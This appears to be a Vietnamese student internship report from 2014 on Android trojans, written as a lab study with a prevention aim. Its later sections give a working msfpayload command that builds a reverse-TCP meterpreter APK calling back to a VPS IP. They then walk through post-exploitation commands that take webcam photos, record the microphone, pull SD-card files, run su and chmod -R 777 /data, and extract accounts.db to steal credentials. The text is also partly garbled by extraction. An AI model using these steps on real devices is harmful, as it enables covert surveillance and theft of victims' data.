ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH TRƯỜNG ĐẠI HỌC BÁCH KHOA KHOA KHOA HỌC & KỸ THUẬT MÁY TÍNH TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO ĐỀ TÀI THỰC TẬP CNTT Nghiên cứu Trojan, Malware cho phép đánh cắp liệu danh sách contact, tin nhắn điên thoại sử dụng Android gửi GVHD: Thầy VÕ ĐỖ THẮNG SVTH: Lê Công Hậu MSSV: 51101058 TPHCM, ngày 28 tháng 07 năm 2014 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng LỜI CAM ĐOAN Tôi xin cam đoan:  Những nội dung báo cáo thực hướng dẫn trực tiếp thầy Võ Đỗ Thắng  Mọi tham khảo dùng báo cáo trích dẫn rõ ràng tên tác giả, tên cơng trình, thời gian, địa điểm công bố  Mọi chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, tơi xin chịu hồn tồn trách nhiệm TPHCM, ngày 28 tháng 07 năm 2014 Sinh viên thực tập Lê Công Hậu SVTH: Lê Công Hậu 51101058 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng LỜI CẢM ƠN KHOA KH & KT MÁY TÍNH, ĐH BK TPHCM Tôi xin chân thành cảm ơn trường Đại Học Bách Khoa TPHCM khoa Khoa Học Kỹ Thuật Máy Tính tạo điều kiện cho tơi hồn thành tốt đợt TTCN Trong đợt thực tập cho kinh nghiệm quý báu Những kinh nghiệm giúp tơi hồn thiện cơng việc môi trường làm việc sau Mặc dù cố gắng hoàn thành báo cáo thực tập tốt nghiệp với tất nỗ lực thân Nhưng trình độ hiểu biết kinh nghiệm thực tế có hạn nên chắn khơng thể tránh khỏi thiếu sót định Tơi mong nhận đóng góp, chia sẻ để tơi làm tốt Một lần xin chân thành cảm ơn TPHCM, ngày 28 tháng 07 năm 2014 Sinh viên thực tập Lê Công Hậu SVTH: Lê Công Hậu 51101058 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng LỜI CẢM ƠN TRUNG TÂM ATHENA Tôi xin cảm ơn giám đốc Công Ty Quản Trị An Ninh Mạng Quốc Tế Athena, anh chị công ty Đặc biệt, xin chân thành cảm ơn thầy Đỗ Võ Thắng nhiệt tình giúp đỡ hướng dẫn suốt thời gian thực tập công ty Thầy tạo điều kiện thuận lợi, cung cấp nhũng kiến thức cần thiết đóng góp ý kiến q báu để hồn thành tốt báo cáo Mặc dù cố gắng hoàn thành báo cáo thực tập tốt nghiệp với tất nỗ lực thân Nhưng trình độ hiểu biết kinh nghiệm thực tế có hạn nên chắn khơng thể tránh khỏi thiếu sót định Tơi mong nhận đóng góp, chia sẻ để tơi làm tốt Một lần xin chân thành cảm ơn TPHCM, ngày 28 tháng 07 năm 2014 Sinh viên thực tập Lê Công Hậu SVTH: Lê Công Hậu 51101058 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng LỜI MỞ ĐẦU Trong năm gần đây, vấn đề “An tồn bảo mật thơng tin” ngày nóng Với phát triển đến chóng mặt tảng di động iOS, Android, Windows Phone với nhiều dịng điện thoại thơng minh, vấn đề bảo mật thông tin chuyển dần xu hướng từ PC sang mobile Nếu bạn sở hữu smartphone Apple, Google Nexus, Samsung, Nokia, HTC, liệu bạn có dám “dế cưng” khơng bị nhiễm phần mềm gián điệp, nghe khơng? Vì lại vậy? Vì theo báo cáo gần hãng phần mềm bảo mật Kaspersky Lab, Norton AV, Avast hay BKAV số lượng smartphone bị nhiễm mã độc ngày tăng Đặc biệt HĐH Android HĐH phát triển nhanh năm gần lại mảnh đất béo bở cho Hacker công Với nhẹ tin, thiếu hiểu biết người dùng, lòng tham các thứ “Free” free app, free wifi vơ tình tiếp tay cho Hacker xâm nhập cài đặt mã độc điện thoại bạn Hơm viết báo cáo đề tài “Nghiên cứu trojan, malware cho phép đánh cắp liệu danh sách contact, tin nhắn điện thoại Android gửi ngồi” để nghiên cứu, tìm hiểu cách thức hoạt động, chia sẻ thông tin cung cấp giải pháp để phịng tránh SVTH: Lê Cơng Hậu 51101058 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng NHẬN XÉT CỦA KHOA TPHCM, ngày tháng năm 2014 Trưởng Khoa SVTH: Lê Công Hậu 51101058 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng NHẬN XÉT CỦA CÔNG TY THỰC TẬP TPHCM, ngày tháng năm 2014 Giám đốc SVTH: Lê Công Hậu 51101058 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN TPHCM, ngày tháng năm 2014 Giáo viên hướng dẫn SVTH: Lê Công Hậu 51101058 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng MỤC LỤC LỜI CAM ĐOAN LỜI CẢM ƠN KHOA KH & KT MÁY TÍNH, ĐH BK TPHCM LỜI CẢM ƠN TRUNG TÂM ATHENA LỜI MỞ ĐẦU NHẬN XÉT CỦA KHOA NHẬN XÉT CỦA CÔNG TY THỰC TẬP NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN MỤC LỤC GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP NỘI DUNG THỰC TẬP 11 2.1 2.1.1 2.1.2 2.1.3 2.1.4 2.1.5 2.1.6 2.1.7 2.1.8 2.1.9 2.2 2.2.1 2.2.2 2.2.3 Làm localhost: 11 Giới thiệu HĐH Kali Linux: 11 Cài đặt Kali Linux VMware: 13 Giới thiệu HĐH Android: 29 Giới thiệu Trojan: 32 Giới thiệu Malware: 34 Sinh mã độc Kali Linux: 36 Đưa mã độc vào thiết bị Android: 41 Xâm nhập SD card thiết bị Android từ Kali Linux: 45 Kết luận: 47 Làm VPS 47 Giới thiệu VPS: 47 Cài đặt mã độc VPS: 49 Từ VPS xâm nhập vào thiết bị Android: 56 KẾT QUẢ ĐẠT ĐƯỢC 60 KẾT LUẬN QUÁ TRÌNH THỰC TẬP 61 SVTH: Lê Công Hậu 51101058 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP Cơ sở 1_Tại TP Hồ Chí Minh: - Trung Tâm Đào Tạo Quản Trị Mạng An Ninh Mạng Quốc Tế ATHENA Số Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam Điện thoại: ( 84-8 ) 3824 4041 Hotline: 0943 23 00 99 Cơ sở 2_Tại TP Hồ Chí Minh: - Trung Tâm Đào Tạo Quản Trị Mạng An Ninh Mạng Quốc Tế ATHENA 92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam Website: www.athena.edu.vn or www.athena.com.vn Điện thoại: (84-8) 2210 3801 Hotline: 0943 20 00 88 - Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA thành lập từ năm 2004, tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy động, nhiệt huyết kinh nghiệm lãnh vực CNTT, với tâm huyết góp phần vào cơng thúc đẩy tiến trình đưa cơng nghệ thơng tin ngành kinh tế mũi nhọn, góp phần phát triển - nước nhà Lĩnh vực hoạt động:  Trung tâm ATHENA tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo tiêu chuẩn quốc tế hãng tiếng Microsoft, Cisco, Oracle, Linux LPI, CEH Song song đó, trung tâm ATHENA cịn có chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng đơn vị Bộ Quốc Phòng, Bộ Công An, ngân hàng, doanh nghiệp, SVTH: Lê Công Hậu 51101058 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Như hình, ta thấy file App.apk, để tải máy, ta nhập lệnh Download App.apk Và file tải thư mục /root máy Kali 2.1.9 Kết luận: Như vậy, ta tìm hiểu Kali Linux, cách sử dụng Metasploit Kali Linux để xâm nhập điều khiển, truyền liệu từ máy android máy Sau thử nghiệm cách công này, ta rút kết luận: không nên tải chạy file lạ máy android để bảo đảm không cài nhầm backdoor thấy trên, cần máy bị nhiễm backdoor ta xem có tồn quyền kiểm sốt máy android 2.2 Làm VPS 2.2.1 Giới thiệu VPS: Định nghĩa Máy chủ ảo (Virtual Private Server -VPS) phương pháp phân chia máy chủ vật lý thành nhiều máy chủ ảo Trong server chạy SVTH: Lê Công Hậu 51101058 Trang 47 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Share Host có hàng trăm tài khoản chạy lúc, server chạy VPS số 1/10 Do vậy, VPS có hiệu cao Share Host nhiều Mỗi máy chủ hệ thống hồn tồn riêng biệt, có hệ điều hành riêng, có tồn quyền quản lý root restart lại hệ thống lúc Do vậy, VPS hạn chế 100% khả bị hack local Trên server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, Website bị công Ddos, botnet mạnh làm ảnh hưởng đến Website khác server, riêng server VPS, tài khoản VPS bị công tài khoản khác VPS hoạt động bình thường VPS dành cho doanh nghiệp vừa trang Web lớn mã nguồn nặng, chạy Share Host không đáp ứng đủ yêu cầu.Tuy nhiên, VPS địi hỏi người sử dụng phải có thêm số kiến thức bảo mật, cấu hình server,… Đặc điểm thơng số VPS Hoạt động hồn tồn server riêng nên sở hữu phần CPU riêng, dung lượng RAM riêng, dung lượng ổ HDD riêng, địa IP riêng hệ điều hành riêng Tiết kiệm nhiều chi phí so với việc thuê server riêng Ngoài việc dùng VPS để thiết lập Web Server, Mail Server ứng dụng khác cài đặt để thực yêu cầu riêng truy cập Web trình duyệt Web VPS, dowload/upload bittorrent với tốc độ cao… Trong trường hợp VPS bị thiếu tài ngun dễ dàng nâng cấp tài nguyên mà không cần phải khởi động lại hệ thống Có thể cài lại hệ điều hành với thời gian từ 5-10 phút Giá trị sử dụng VPS Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp Miễn phí chi phí cài đặt ban đầu cấu hình hoạt động cho khác hàng SVTH: Lê Cơng Hậu 51101058 Trang 48 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Hỗ trợ khác hàng cài đặt miễn phí thêm phần mềm riêng Được cấu hình cài đặt hệ thống Firewall DDOS Protection Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng có cố phát sinh 2.2.2 Cài đặt mã độc VPS: Giới thiệu Metasploit công cụ khai thác lỗ hổng hệ điều hành, dùng để kiểm tra, công khai thác lỗi service Metasploit xây dựng từ ngôn ngữ hướng đối tượng Perl, với components viết C, assembler, Python Metasploit chạy hầu hết hệ điều hành: Linux, Windows, Mac OS Cài đặt Tải gói cài đặt Metasploit, ta có phiên Pro Community Ta chọn phiên Community miễn phí dùng cho nghiên cứu SVTH: Lê Cơng Hậu 51101058 Trang 49 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Sau tải gói cài đặt Metasploit Community ta cài đặt phần mềm khác SVTH: Lê Công Hậu 51101058 Trang 50 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Chọn folder cài đặt: Cổng dịch vụ Metasploit sử dụng, mặc định 3790: SVTH: Lê Công Hậu 51101058 Trang 51 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Chọn server ngày hết hạn, để mặc định: Quá trình cài đặt Metasploit: SVTH: Lê Công Hậu 51101058 Trang 52 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Tiến trình hồn tất, chọn Finish truy cập đến giao diện web chương trình: Sau Finish trình duyệt web mở lên tới giao diện SVTH: Lê Công Hậu 51101058 Trang 53 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Click vào link: https://localhost:3790/ dẫn đến trang tạo tài khoản để login vào Metasploit Điền Username, Password sử dụng số thông tin bổ xung, chọn Create Account: Trình duyệt chuyển đến trang nhập key để active chương trình, key gửi miễn phí đến mail tải phần mềm Sau điền key nhấn Activate License: SVTH: Lê Công Hậu 51101058 Trang 54 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Giao diện chương trình Metasploit Console SVTH: Lê Công Hậu 51101058 Trang 55 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng 2.2.3 Từ VPS xâm nhập vào thiết bị Android: Các bước thực Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android mang LAN với địa IP địa VPS Chúng ta sử dụng lệnh msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R > /root/Desktop/files.apk Ở địa VPS 14.0.21.132 Khởi động Metasploit Console VPS Chúng ta thực bước xâm nhập đề cập phần trên, khác sử dụng IP VPS SVTH: Lê Công Hậu 51101058 Trang 56 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Sau máy nạn nhân tải file apk tạo ra, máy android bị hack SVTH: Lê Cơng Hậu 51101058 Trang 57 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Sử dụng lệnh Help để xem lệnh metasploit hỗ trợ Để xem thông tin máy, nhập lệnh sysinfo Để xem tác vụ chạy gõ ps Xem ip gõ ifconfig Xem danh sách thư mục, file gõ ls Sử dụng camera: Để xem danh sách camera, nhập webcam_list Để chụp hình camera, nhập webcam_snap x với x id camera xem danh sách camera phần trước máy Ghi âm Để thực ghi âm, nhập lênh record_mic file ghi âm lưu SVTH: Lê Công Hậu 51101058 Trang 58 Báo cáo thực tập mục GVHD: Thầy Võ Đỗ Thắng Lấy file từ sd card Để vào sdcard, nhập lệnh: cd /sdcard lệnh ls để xem danh sách file, thư Dùng lệnh cd /sdcard/Download để vào thư mục Để tải máy, ta nhập lệnh Download App.apk Để upload gõ lệnh upload Và file tải thư mục root máy Kali Gõ shell để vào lệnh kiểm tra xem có root chưa gõ su whoami Nếu báo unknown id is tức root ls -l danh mục file quyền cd để chuyển hướng thư mục Để ăn cắp tài khoản, mật khẩu, file apk thay đổi quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ để xem danh sách down load file hay thay đổi file ROM phải gõ lệnh SU để có tồn quyền truy cập để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data Ctrl + C để quay lại Sử dụng SQLite để mở file db SVTH: Lê Công Hậu 51101058 Trang 59 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng KẾT QUẢ ĐẠT ĐƯỢC Những kiến thức lý thuyết củng cố:     Tìm hiểu lịch sử, trình phát triển hệ điều hành Android Tìm hiểu hệ điều hành Kali Linux Tìm hiểu lỗ hổng bảo mật Windows Android Tìm hiểu cách sửa đổi file APK thực Signing ứng dụng Những kỹ thực hành học thêm:  Thực cài đặt Android máy ảo  Cài đặt Kali Linux, sử dụng để hack vào lỗ hổng bảo mật Windows Android  Thi lấy chứng System Hacking trung tâm Athena  Thực sửa đổi, tạo file Trojan, Backdoor sau cài đặt vào Android  Biết thêm số học lớp Hacker mũ trắng Những kinh nghiệm thực tiễn tích lũy được: Qua gần tháng thực tập, thân em đúc kết nhiều kinh nghiệm quý báu, thứ kĩ chuyên môn, em học cố kiến thức bên cạnh kiến thức tảng Hơn q trình thực tập môi trường doanh nghiệp cho em làm quen dần để khơng bỡ ngỡ q trình làm sau này, thông qua kĩ giao tiếp ứng xử SVTH: Lê Công Hậu 51101058 Trang 60 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng KẾT LUẬN QUÁ TRÌNH THỰC TẬP SVTH: Lê Công Hậu 51101058 Trang 61 ... thoại bạn Hơm viết báo cáo đề tài ? ?Nghiên cứu trojan, malware cho phép đánh cắp liệu danh sách contact, tin nhắn điện thoại Android gửi ngồi” để nghiên cứu, tìm hiểu cách thức hoạt động, chia sẻ thông.. .Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng LỜI CAM ĐOAN Tôi xin cam đoan:  Những nội dung báo cáo thực hướng dẫn trực tiếp thầy Võ Đỗ Thắng  Mọi tham khảo dùng báo cáo trích dẫn... Trang 15 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Sau chọn tên máy ảo nơi lưu trữ liệu Hình 2.1.4 New Virtual Machine Wizard (Step 3) SVTH: Lê Công Hậu 51101058 Trang 16 Báo cáo thực tập GVHD: